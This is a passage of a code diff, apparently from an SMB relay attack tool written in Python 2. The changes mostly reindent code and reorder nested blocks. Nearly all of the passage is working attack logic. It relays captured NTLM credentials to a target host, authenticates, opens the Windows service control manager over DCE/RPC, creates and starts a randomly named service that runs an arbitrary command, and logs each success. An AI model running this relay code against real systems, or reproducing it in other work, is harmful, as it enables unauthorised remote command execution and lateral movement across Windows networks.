-                t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
+                    t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
-                t.calculate()
+                    t.calculate()
-                packet0 = str(head)+str(t)
+                    packet0 = str(head)+str(t)
-                buffer1 = longueur(packet0)+packet0
+                    buffer1 = longueur(packet0)+packet0
-                s.send(buffer1)
+                    s.send(buffer1)
-                data = s.recv(2048)
+                    data = s.recv(2048)
-       except:
+        except:
-          raise
+            raise
-          a = None
+            a = None
    if data[8:10] == "\x73\x6d":
-          print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
+        print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
-          Logs.info(CLIENTIP+":"+Username)
+        Logs.info(CLIENTIP+":"+Username)
    if data[8:10] == "\x73\x0d":
-          print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
+        print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
-          Logs.info(CLIENTIP+":"+Username)
+        Logs.info(CLIENTIP+":"+Username)
-       ## NtCreateAndx
+        ## NtCreateAndx
    if data[8:10] == "\x73\x00":
-          print "[+] Authenticated, trying to PSexec on target !"
+        print "[+] Authenticated, trying to PSexec on target !"
-          head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+        head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-          t = SMBNTCreateData()
+        t = SMBNTCreateData()
-          t.calculate()
+        t.calculate()
-          packet0 = str(head)+str(t)
+        packet0 = str(head)+str(t)
-          buffer1 = longueur(packet0)+packet0  
+        buffer1 = longueur(packet0)+packet0
-          s.send(buffer1)
+        s.send(buffer1)
-          data = s.recv(2048)
+        data = s.recv(2048)
-       ## Fail Handling.
+        ## Fail Handling.
    if data[8:10] == "\xa2\x22":
-          print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
+        print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
-       ## DCE/RPC Write.
+        ## DCE/RPC Write.
    if data[8:10] == "\xa2\x00":
-          head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-          x = SMBDCEData()
+        x = SMBDCEData()
-          x.calculate()
+        x.calculate()
-          f = data[42:44]
+        f = data[42:44]
-          t = SMBWriteData(FID=f,Data=x)
+        t = SMBWriteData(FID=f,Data=x)
-          t.calculate()
+        t.calculate()
-          packet0 = str(head)+str(t)
+        packet0 = str(head)+str(t)
-          buffer1 = longueur(packet0)+packet0  
+        buffer1 = longueur(packet0)+packet0
-          s.send(buffer1)
+        s.send(buffer1)
-          data = s.recv(2048)
+        data = s.recv(2048)
-          ## DCE/RPC Read.
+        ## DCE/RPC Read.
-          if data[8:10] == "\x2f\x00":
+        if data[8:10] == "\x2f\x00":
-             head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-             t = SMBReadData(FID=f)
+            t = SMBReadData(FID=f)
-             t.calculate()
+            t.calculate()
-             packet0 = str(head)+str(t)
+            packet0 = str(head)+str(t)
-             buffer1 = longueur(packet0)+packet0  
+            buffer1 = longueur(packet0)+packet0
-             s.send(buffer1)
+            s.send(buffer1)
-             data = s.recv(2048)
+            data = s.recv(2048)
-             ## DCE/RPC SVCCTLOpenManagerW.
+            ## DCE/RPC SVCCTLOpenManagerW.
-             if data[8:10] == "\x2e\x00":
+            if data[8:10] == "\x2e\x00":
                head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")
                w.calculate()
@ -331,113 +331,113 @@ def RunRelay(host, Command,Domain):
                data = s.recv(2048)
                ## DCE/RPC Read Answer.
                if data[8:10] == "\x2f\x00":
-                   head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                    head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                   t = SMBReadData(FID=f)
+                    t = SMBReadData(FID=f)
-                   t.calculate()
+                    t.calculate()
-                   packet0 = str(head)+str(t)
+                    packet0 = str(head)+str(t)
-                   buffer1 = longueur(packet0)+packet0  
+                    buffer1 = longueur(packet0)+packet0
-                   s.send(buffer1)
+                    s.send(buffer1)
-                   data = s.recv(2048)
+                    data = s.recv(2048)
-                   ## DCE/RPC SVCCTLCreateService.
+                    ## DCE/RPC SVCCTLCreateService.
-                   if data[8:10] == "\x2e\x00":
+                    if data[8:10] == "\x2e\x00":
-                      if data[len(data)-4:] == "\x05\x00\x00\x00":
+                        if data[len(data)-4:] == "\x05\x00\x00\x00":
-                         print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
+                            print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
-                      print "[+] Creating service"
+                        print "[+] Creating service"
-                      head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                      ContextHandler = data[88:108]
+                        ContextHandler = data[88:108]
-                      ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
+                        ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
-                      ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
+                        ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
-                      FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
+                        FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
-                      w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
+                        w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
-                      w.calculate()
+                        w.calculate()
-                      x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
+                        x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
-                      x.calculate()
+                        x.calculate()
-                      t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
+                        t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
-                      t.calculate()
+                        t.calculate()
-                      packet0 = str(head)+str(t)
+                        packet0 = str(head)+str(t)
-                      buffer1 = longueur(packet0)+packet0  
+                        buffer1 = longueur(packet0)+packet0
-                      s.send(buffer1)
+                        s.send(buffer1)
-                      data = s.recv(2048)
+                        data = s.recv(2048)
-                      ## DCE/RPC Read Answer.
+                        ## DCE/RPC Read Answer.
-                      if data[8:10] == "\x2f\x00":
+                        if data[8:10] == "\x2f\x00":
-                         head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                         t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
+                            t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                         t.calculate()
                         packet0 = str(head)+str(t)
                         buffer1 = longueur(packet0)+packet0  
                         s.send(buffer1)
                         data = s.recv(2048)
                         ## DCE/RPC SVCCTLOpenService.
                         if data[8:10] == "\x2e\x00":
                            if data[len(data)-4:] == "\x05\x00\x00\x00":
                               print "[+] Failed to create the service"
                            head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                            w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
                            w.calculate()
                            x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
                            x.calculate()
                            t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                            t.calculate()
                            packet0 = str(head)+str(t)
                            buffer1 = longueur(packet0)+packet0
                            s.send(buffer1)
                            data = s.recv(2048)
-                            ## DCE/RPC Read Answer.
+                            ## DCE/RPC SVCCTLOpenService.
-                            if data[8:10] == "\x2f\x00":
+                            if data[8:10] == "\x2e\x00":
-                               head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                                if data[len(data)-4:] == "\x05\x00\x00\x00":
-                               t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
+                                    print "[+] Failed to create the service"
-                               t.calculate()
+
-                               packet0 = str(head)+str(t)
+                                head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                               buffer1 = longueur(packet0)+packet0  
+                                w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
-                               s.send(buffer1)
+                                w.calculate()
-                               data = s.recv(2048)
+                                x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
-                               ## DCE/RPC SVCCTLStartService.
+                                x.calculate()
-                               if data[8:10] == "\x2e\x00":
+                                t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
-                                  if data[len(data)-4:] == "\x05\x00\x00\x00":
+                                t.calculate()
-                                     print "[+] Failed to open the service"
+                                packet0 = str(head)+str(t)
-                                  ContextHandler = data[88:108]
+                                buffer1 = longueur(packet0)+packet0
-                                  head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                                s.send(buffer1)
-                                  w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
+                                data = s.recv(2048)
-                                  x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
+                                ## DCE/RPC Read Answer.
-                                  x.calculate()
+                                if data[8:10] == "\x2f\x00":
-                                  t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
+                                    head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                                  t.calculate()
+                                    t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
-                                  packet0 = str(head)+str(t)
+                                    t.calculate()
-                                  buffer1 = longueur(packet0)+packet0  
+                                    packet0 = str(head)+str(t)
-                                  s.send(buffer1)
+                                    buffer1 = longueur(packet0)+packet0
-                                  data = s.recv(2048)
+                                    s.send(buffer1)
-                                  ## DCE/RPC Read Answer.
+                                    data = s.recv(2048)
-                                  if data[8:10] == "\x2f\x00":
+                                    ## DCE/RPC SVCCTLStartService.
-                                     head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                                    if data[8:10] == "\x2e\x00":
-                                     t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
+                                        if data[len(data)-4:] == "\x05\x00\x00\x00":
-                                     t.calculate()
+                                            print "[+] Failed to open the service"
-                                     packet0 = str(head)+str(t)
+                                        ContextHandler = data[88:108]
-                                     buffer1 = longueur(packet0)+packet0  
+                                        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-                                     s.send(buffer1)
+                                        w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
-                                     data = s.recv(2048)
+                                        x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
-                                     if data[8:10] == "\x2e\x00":
+                                        x.calculate()
-                                        print "[+] Command successful !"
+                                        t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
-                                        Logs.info('Command successful:')
+                                        t.calculate()
-                                        Logs.info(Target+","+Username+','+CMD)
+                                        packet0 = str(head)+str(t)
-                                        return True
+                                        buffer1 = longueur(packet0)+packet0
-                                     if data[8:10] != "\x2e\x00":
+                                        s.send(buffer1)
-                                        return False
+                                        data = s.recv(2048)
                                        ## DCE/RPC Read Answer.
                                        if data[8:10] == "\x2f\x00":
                                            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                            t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                            t.calculate()
                                            packet0 = str(head)+str(t)
                                            buffer1 = longueur(packet0)+packet0
                                            s.send(buffer1)
                                            data = s.recv(2048)
                                            if data[8:10] == "\x2e\x00":
                                                print "[+] Command successful !"
                                                Logs.info('Command successful:')
                                                Logs.info(Target+","+Username+','+CMD)
                                                return True
                                            if data[8:10] != "\x2e\x00":
                                                return False
 def RunInloop(Target,Command,Domain):
-   try:
+    try:
-      while True:
+        while True:
-         worker = RunRelay(Target,Command,Domain)
+            worker = RunRelay(Target,Command,Domain)
-   except:
+    except:
-      raise
+        raise
 def main():
-   try:
+    try:
-      thread.start_new(RunInloop,(Target,Command,Domain))
+        thread.start_new(RunInloop,(Target,Command,Domain))
-   except KeyboardInterrupt:
+    except KeyboardInterrupt:
-      exit()
+        exit()
 if __name__ == '__main__':
    try:
@ -445,4 +445,3 @@ if __name__ == '__main__':
    except KeyboardInterrupt:
        raise
    raw_input()